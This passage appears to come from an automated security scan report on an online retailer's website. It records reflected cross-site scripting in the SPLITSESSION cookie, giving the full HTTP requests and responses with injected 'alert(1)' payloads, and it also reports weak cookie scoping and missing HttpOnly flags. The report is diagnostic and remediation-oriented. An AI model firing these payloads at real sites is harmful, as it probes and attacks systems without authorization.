Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C4928f'%3balert(1)//901a0f6a2f6; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:04:10 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:04:10 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 43433


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|4928f';alert(1)//901a0f6a2f6');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.73. http://www.ebags.com/shoppingcart/index.cfm [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /shoppingcart/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83e1c'%3balert(1)//6f77a7517bf was submitted in the SPLITSESSION cookie. This input was echoed as 83e1c';alert(1)//6f77a7517bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shoppingcart/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C83e1c'%3balert(1)//6f77a7517bf; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:06:20 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 14:06:20 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 63958


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','BECOME01$COUPONID=40959822');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|83e1c';alert(1)//6f77a7517bf');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.74. http://www.ebags.com/travel_accessories/car_travel_accessories/category_search/index.cfm [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /travel_accessories/car_travel_accessories/category_search/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80efe'%3balert(1)//3406a34fe1c was submitted in the SPLITSESSION cookie. This input was echoed as 80efe';alert(1)//3406a34fe1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /travel_accessories/car_travel_accessories/category_search/index.cfm?Ne=100&N=4001+2006737 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C80efe'%3balert(1)//3406a34fe1c; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:18:56 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:18:56 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 114681


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|80efe';alert(1)//3406a34fe1c');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.75. http://www.ebags.com/travel_accessories/car_travel_accessories/category_search/index.cfm [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /travel_accessories/car_travel_accessories/category_search/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdf5a'%3balert(1)//c7e07e7fbd8 was submitted in the SPLITSESSION cookie. This input was echoed as bdf5a';alert(1)//c7e07e7fbd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /travel_accessories/car_travel_accessories/category_search/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cbdf5a'%3balert(1)//c7e07e7fbd8; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:18:15 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:18:15 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 127323


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|bdf5a';alert(1)//c7e07e7fbd8');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.76. http://www.ebags.com/travel_accessories/department/index.cfm [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /travel_accessories/department/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55a7b'%3balert(1)//3fe6ba4f5e4 was submitted in the SPLITSESSION cookie. This input was echoed as 55a7b';alert(1)//3fe6ba4f5e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /travel_accessories/department/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C55a7b'%3balert(1)//3fe6ba4f5e4; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:17:14 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:17:14 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 75261


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|55a7b';alert(1)//3fe6ba4f5e4');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.77. http://www.ebags.com/travel_accessories/travel_electronics_cases/category_search/index.cfm [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /travel_accessories/travel_electronics_cases/category_search/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16d6b'%3balert(1)//184a31eb581 was submitted in the SPLITSESSION cookie. This input was echoed as 16d6b';alert(1)//184a31eb581 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /travel_accessories/travel_electronics_cases/category_search/index.cfm?Ne=100&N=4001+20013816 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C16d6b'%3balert(1)//184a31eb581; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:19:19 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=808CF272DALERT281292D27269B66DFCDF; expires=Sun, 02-Jan-2011 14:19:19 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 120267


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','808CF272DALERT281292D27269B66DFCDF');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|16d6b';alert(1)//184a31eb581');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.78. http://www.ebags.com/travel_accessories/travel_electronics_cases/category_search/index.cfm [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /travel_accessories/travel_electronics_cases/category_search/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9170f'%3balert(1)//003e259fe6f was submitted in the SPLITSESSION cookie. This input was echoed as 9170f';alert(1)//003e259fe6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /travel_accessories/travel_electronics_cases/category_search/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C9170f'%3balert(1)//003e259fe6f; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:18:29 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID; expires=Sun, 02-Jan-2011 14:18:29 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 127384


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','BECOME01$COUPONID');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|9170f';alert(1)//003e259fe6f');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

2. Cookie scoped to parent domain  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ebags.com
Path:   /product/case-logic/sony-psp-game-case/120830

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Request

GET /product/case-logic/sony-psp-game-case/120830?productid=1312640&sourceID=BECOME01$couponid=40959822 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:55:59 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: CFID=495108; domain=.ebags.com; expires=Tue, 24-Dec-2019 13:55:59 GMT; path=/
Set-Cookie: CFTOKEN=39324650; domain=.ebags.com; expires=Tue, 24-Dec-2019 13:55:59 GMT; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 13:55:59 GMT; path=/
Set-Cookie: SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 76246


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next
There are 59 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ebags.com
Path:   /product/case-logic/sony-psp-game-case/120830

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/case-logic/sony-psp-game-case/120830?productid=1312640&sourceID=BECOME01$couponid=40959822 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:55:59 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: CFID=495108; domain=.ebags.com; expires=Tue, 24-Dec-2019 13:55:59 GMT; path=/
Set-Cookie: CFTOKEN=39324650; domain=.ebags.com; expires=Tue, 24-Dec-2019 13:55:59 GMT; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 13:55:59 GMT; path=/
Set-Cookie: SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 76246


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1
...[SNIP]...

3.2. http://www.ebags.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:02:34 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 14:02:34 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 74986


